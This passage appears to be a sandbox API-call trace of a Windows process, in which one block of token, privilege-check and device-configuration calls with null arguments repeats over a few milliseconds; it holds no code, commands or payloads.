[0084.868] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.868] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.868] SetLastError (dwErrCode=0x522) [0084.868] CloseHandle (hObject=0x114) returned 1 [0084.868] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.868] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.868] GetLastError () returned 0x578 [0084.868] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.868] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.869] GetCurrentThread () returned 0xfffffffe [0084.869] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.869] GetLastError () returned 0x3f0 [0084.869] GetCurrentProcess () returned 0xffffffff [0084.869] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.869] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.869] SetLastError (dwErrCode=0x522) [0084.869] CloseHandle (hObject=0x114) returned 1 [0084.869] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.869] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.869] GetLastError () returned 0x578 [0084.869] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.869] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.869] GetCurrentThread () returned 0xfffffffe [0084.869] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.869] GetLastError () returned 0x3f0 [0084.869] GetCurrentProcess () returned 0xffffffff [0084.869] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.869] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.869] SetLastError (dwErrCode=0x522) [0084.869] CloseHandle (hObject=0x114) returned 1 [0084.869] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.869] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.869] GetLastError () returned 0x578 [0084.869] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.869] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.869] GetCurrentThread () returned 0xfffffffe [0084.869] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.869] GetLastError () returned 0x3f0 [0084.869] GetCurrentProcess () returned 0xffffffff [0084.869] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.869] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.869] SetLastError (dwErrCode=0x522) [0084.869] CloseHandle (hObject=0x114) returned 1 [0084.869] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.869] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.869] GetLastError () returned 0x578 [0084.869] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.869] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.869] GetCurrentThread () returned 0xfffffffe [0084.869] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.869] GetLastError () returned 0x3f0 [0084.869] GetCurrentProcess () returned 0xffffffff [0084.869] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.869] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.869] SetLastError (dwErrCode=0x522) [0084.869] CloseHandle (hObject=0x114) returned 1 [0084.870] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.870] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.870] GetLastError () returned 0x578 [0084.870] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.870] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.870] GetCurrentThread () returned 0xfffffffe [0084.870] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.870] GetLastError () returned 0x3f0 [0084.870] GetCurrentProcess () returned 0xffffffff [0084.870] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.870] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.870] SetLastError (dwErrCode=0x522) [0084.870] CloseHandle (hObject=0x114) returned 1 [0084.870] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.870] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.870] GetLastError () returned 0x578 [0084.870] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.870] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.870] GetCurrentThread () returned 0xfffffffe [0084.870] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.870] GetLastError () returned 0x3f0 [0084.870] GetCurrentProcess () returned 0xffffffff [0084.870] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.870] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.870] SetLastError (dwErrCode=0x522) [0084.870] CloseHandle (hObject=0x114) returned 1 [0084.870] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.870] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.870] GetLastError () returned 0x578 [0084.870] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.870] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.870] GetCurrentThread () returned 0xfffffffe [0084.870] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.870] GetLastError () returned 0x3f0 [0084.870] GetCurrentProcess () returned 0xffffffff [0084.870] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.870] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.870] SetLastError (dwErrCode=0x522) [0084.870] CloseHandle (hObject=0x114) returned 1 [0084.870] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.870] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.870] GetLastError () returned 0x578 [0084.870] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.870] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.870] GetCurrentThread () returned 0xfffffffe [0084.870] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.870] GetLastError () returned 0x3f0 [0084.870] GetCurrentProcess () returned 0xffffffff [0084.871] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.871] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.871] SetLastError (dwErrCode=0x522) [0084.871] CloseHandle (hObject=0x114) returned 1 [0084.871] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.871] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.871] GetLastError () returned 0x578 [0084.871] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.871] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.871] GetCurrentThread () returned 0xfffffffe [0084.871] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.871] GetLastError () returned 0x3f0 [0084.871] GetCurrentProcess () returned 0xffffffff [0084.871] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.871] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.871] SetLastError (dwErrCode=0x522) [0084.871] CloseHandle (hObject=0x114) returned 1 [0084.871] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.871] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.871] GetLastError () returned 0x578 [0084.871] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.871] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.871] GetCurrentThread () returned 0xfffffffe [0084.871] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.871] GetLastError () returned 0x3f0 [0084.871] GetCurrentProcess () returned 0xffffffff [0084.871] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.871] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.871] SetLastError (dwErrCode=0x522) [0084.871] CloseHandle (hObject=0x114) returned 1 [0084.871] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.871] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.871] GetLastError () returned 0x578 [0084.871] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.871] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.871] GetCurrentThread () returned 0xfffffffe [0084.871] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.871] GetLastError () returned 0x3f0 [0084.871] GetCurrentProcess () returned 0xffffffff [0084.871] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.872] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.872] SetLastError (dwErrCode=0x522) [0084.872] CloseHandle (hObject=0x114) returned 1 [0084.872] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.872] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.872] GetLastError () returned 0x578 [0084.872] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.872] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.872] GetCurrentThread () returned 0xfffffffe [0084.872] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.872] GetLastError () returned 0x3f0 [0084.872] GetCurrentProcess () returned 0xffffffff [0084.872] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.872] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.872] SetLastError (dwErrCode=0x522) [0084.872] CloseHandle (hObject=0x114) returned 1 [0084.872] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.872] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.872] GetLastError () returned 0x578 [0084.872] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.872] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.872] GetCurrentThread () returned 0xfffffffe [0084.872] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.872] GetLastError () returned 0x3f0 [0084.872] GetCurrentProcess () returned 0xffffffff [0084.872] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.872] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.872] SetLastError (dwErrCode=0x522) [0084.872] CloseHandle (hObject=0x114) returned 1 [0084.872] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.872] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.872] GetLastError () returned 0x578 [0084.872] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.872] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.872] GetCurrentThread () returned 0xfffffffe [0084.872] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.872] GetLastError () returned 0x3f0 [0084.872] GetCurrentProcess () returned 0xffffffff [0084.872] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.872] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.872] SetLastError (dwErrCode=0x522) [0084.872] CloseHandle (hObject=0x114) returned 1 [0084.873] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.873] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.873] GetLastError () returned 0x578 [0084.873] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.873] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.873] GetCurrentThread () returned 0xfffffffe [0084.873] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.873] GetLastError () returned 0x3f0 [0084.873] GetCurrentProcess () returned 0xffffffff [0084.873] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.873] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.873] SetLastError (dwErrCode=0x522) [0084.873] CloseHandle (hObject=0x114) returned 1 [0084.873] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.873] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.873] GetLastError () returned 0x578 [0084.873] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.873] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.873] GetCurrentThread () returned 0xfffffffe [0084.873] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.873] GetLastError () returned 0x3f0 [0084.873] GetCurrentProcess () returned 0xffffffff [0084.873] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.873] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.873] SetLastError (dwErrCode=0x522) [0084.873] CloseHandle (hObject=0x114) returned 1 [0084.873] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.873] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.873] GetLastError () returned 0x578 [0084.873] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.873] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.873] GetCurrentThread () returned 0xfffffffe [0084.873] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.873] GetLastError () returned 0x3f0 [0084.873] GetCurrentProcess () returned 0xffffffff [0084.873] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.873] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.873] SetLastError (dwErrCode=0x522) [0084.873] CloseHandle (hObject=0x114) returned 1 [0084.873] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.873] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.873] GetLastError () returned 0x578 [0084.874] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.874] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.874] GetCurrentThread () returned 0xfffffffe [0084.874] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.874] GetLastError () returned 0x3f0 [0084.874] GetCurrentProcess () returned 0xffffffff [0084.874] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.874] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.874] SetLastError (dwErrCode=0x522) [0084.874] CloseHandle (hObject=0x114) returned 1 [0084.874] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.874] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.874] GetLastError () returned 0x578 [0084.874] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.874] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.874] GetCurrentThread () returned 0xfffffffe [0084.874] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.874] GetLastError () returned 0x3f0 [0084.874] GetCurrentProcess () returned 0xffffffff [0084.874] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.874] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.874] SetLastError (dwErrCode=0x522) [0084.874] CloseHandle (hObject=0x114) returned 1 [0084.874] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.874] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.874] GetLastError () returned 0x578 [0084.874] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.874] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.874] GetCurrentThread () returned 0xfffffffe [0084.874] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.874] GetLastError () returned 0x3f0 [0084.874] GetCurrentProcess () returned 0xffffffff [0084.874] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.874] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.874] SetLastError (dwErrCode=0x522) [0084.874] CloseHandle (hObject=0x114) returned 1 [0084.874] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.874] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.874] GetLastError () returned 0x578 [0084.874] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.874] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.874] GetCurrentThread () returned 0xfffffffe [0084.874] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.875] GetLastError () returned 0x3f0 [0084.875] GetCurrentProcess () returned 0xffffffff [0084.875] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.875] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.875] SetLastError (dwErrCode=0x522) [0084.875] CloseHandle (hObject=0x114) returned 1 [0084.875] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.875] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.875] GetLastError () returned 0x578 [0084.875] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.875] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.875] GetCurrentThread () returned 0xfffffffe [0084.875] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.875] GetLastError () returned 